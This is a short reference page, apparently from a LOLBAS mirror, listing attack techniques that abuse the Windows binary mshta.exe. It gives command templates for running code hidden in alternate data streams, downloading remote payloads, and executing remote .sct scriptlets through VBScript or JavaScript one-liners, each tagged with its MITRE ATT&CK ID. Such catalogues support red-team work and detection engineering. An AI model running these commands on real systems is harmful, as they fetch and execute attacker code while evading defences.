🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Mshta.exe

Mshta.exe

Used by Windows to execute html applications. (.hta)

ADS

Execute code hidden in alternate data stream

mshta.exe "{PATH_ABSOLUTE}:file.hta"

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. — MITRE: T1218.005 — Privileges: User

Download

Downloads payload from remote server

mshta.exe {REMOTEURL}

It will download a remote payload and place it in INetCache. — MITRE: T1105 — Privileges: User

Execute

Execute code

mshta.exe {PATH:.hta}

Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. — MITRE: T1218.005 — Privileges: User

Execute code

mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))

Executes VBScript supplied as a command line argument. — MITRE: T1218.005 — Privileges: User

Execute code

mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();

Executes JavaScript supplied as a command line argument. — MITRE: T1218.005 — Privileges: User